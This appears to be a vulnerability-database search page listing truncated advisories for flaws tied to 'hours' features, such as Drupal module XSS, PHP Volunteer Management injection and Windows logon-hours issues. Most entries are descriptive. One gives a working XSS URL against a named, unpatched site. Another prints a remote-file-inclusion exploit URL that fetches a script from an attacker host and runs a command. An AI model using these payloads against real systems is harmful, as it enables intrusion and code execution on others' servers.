198 matches found
Drupal Office Hours Module Cross-Site Scripting Vulnerability
Drupal is a free, open-source content management system developed in PHP and maintained by the Drupal community.Office Hours is one of the modules that defines the "Weekly Office Hours" field type. A cross-site scripting vulnerability exists in the Drupal Office Hours module, which is caused by a...
Office Hours - Moderately Critical - Cross Site Scripting - DRUPAL-SA-CONTRIB-2017-032
This module enables you to show the office hours of a location to the public. The module doesn't sufficiently filter user input for malicious Cross Site Scripting xss. This vulnerability is mitigated by the fact that an attacker must have a role with a permission to add fields to an entity. CVE...
Drupal Opening Hours Module Cross-Site Scripting Vulnerability
Drupal is a free, open-source content management system developed in PHP and maintained by the Drupal community. opening hours is one of the modules used to find stores or libraries that are open at a certain time. A cross-site scripting vulnerability exists in the Drupal Opening Hours module in...
Opening hours - Moderately Critical - XSS - SA-CONTRIB-2016-031
This module enables you to enter opening hours for locations in a highly detailed way. The module doesn't sufficiently escape input data from user input. This vulnerability is mitigated by the fact that an attacker must be able to edit opening hours by having a role with the permission “Edit...
lunarium.co.uk XSS vulnerability
Vulnerable URL: http://www.lunarium.co.uk/planets/hours.jsp?location=1%22--%3E%3Csvg/onload=;prompt%28/OPENBUGBOUNTY/%29;%3E=44.50=20.30=Europe/Belgrade=UK=degMin Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:|...
Whatsapp Banned Users For Using WhatsApp PLUS App
Are you one of those victims whose WhatsApp app has recently been banned?? Then you must have installed a 3rd-party version of WhatsApp client, like WhatsAppMD or Whatsapp PLUS in your mobile phone for sure. Reportedly after 12 AM IST on 21st January 2015, WhatsApp, the widely popular messaging...
DDoS attack from Browser-based Botnets that lasted for 150 hours
Browser-based botnets are the T-1000s of the DDoS world. Just like the iconic villain of the old Judgment Day movie, they too are designed for adaptive infiltration. This is what makes them so dangerous. Where other more primitive bots would try to brute-force your defenses, these bots can simply...
Sql injection
SQL injection vulnerability in mods/hours/data/gethours.php in PHP Volunteer Management 1.0.2 allows remote attackers to execute arbitrary SQL commands via the id parameter...
CVE-2012-6505
CVE-2012-6505 is an XSS vulnerability in PHP Volunteer Management 1.0.2, specifically in mods/hours/data/get_hours.php where the id parameter can be abused to inject arbitrary script/HTML. Affected component is the get_hours.php routine; root cause is improper handling/validation of the id input....
Squirrelcart Cart Shop v3.3.4 - Multiple Web Vulnerabilities
Title: ====== Squirrelcart Cart Shop v3.3.4 - Multiple Web Vulnerabilities Date: ===== 2012-06-04 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=592 VL-ID: ===== 592 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ===========...
PHP Volunteer Management 1.0.x<=1.0.2 /mods/hours/data/get-hours.php sql注入
No description provided by source...
Microsoft Windows Active Directory users account enumeration
It's possible to enumerate accounts with Logon Hours limitation set...
[Full-disclosure] Microsoft Windows Active Directory Logon Hours User Enumeration Weakness
Windows Server 2003 can be configured http://support.microsoft.com/kb/816666 to restrict the hours and days that a user may log on to a Windows Server 2003 domain. This could lead to username enumeration. Issue:- Microsoft Windows Active Directory Username Enumeration Criticality:- Less Critical...
randshop <= 1.1.x (index.php) Remote File Inclusion Vulnerability
Title : randshop = 1.1.x Remote File Inclusion Vulnerability - URL : http://www.randshop.com/ - Author :Saudi Hackrz - contact : Saudi.UnixatHotmail.com - dork : "software 2004-2005 by randshop" - exploit : http://target/path/index.php?dateiPfad=http://attacker/cmd.txt?&cmd=ls - greatz : SnIpEr.S...
CVE-1999-0597
CVE-1999-0597 concerns a Windows NT account policy where remote users are not forcibly disconnected when logon hours expire. Several sources (NVD, Red Hat, CVE list, Red Team/PT security pages) confirm the issue is tied to the Windows NT account policy and its handling of remote logins; no detail...
CVE-1999-0597
A Windows NT account policy does not forcibly disconnect remote users from the server when their logon hours expire...
CVE-1999-0597
A Windows NT account policy does not forcibly disconnect remote users from the server when their logon hours expire...
PT-1999-1215 · Microsoft · Windows Nt
Name of the Vulnerable Software and Affected Versions: Windows NT affected versions not specified Description: A Windows NT account policy issue allows remote users to remain connected to the server even after their logon hours have expired, as the policy does not forcibly disconnect them...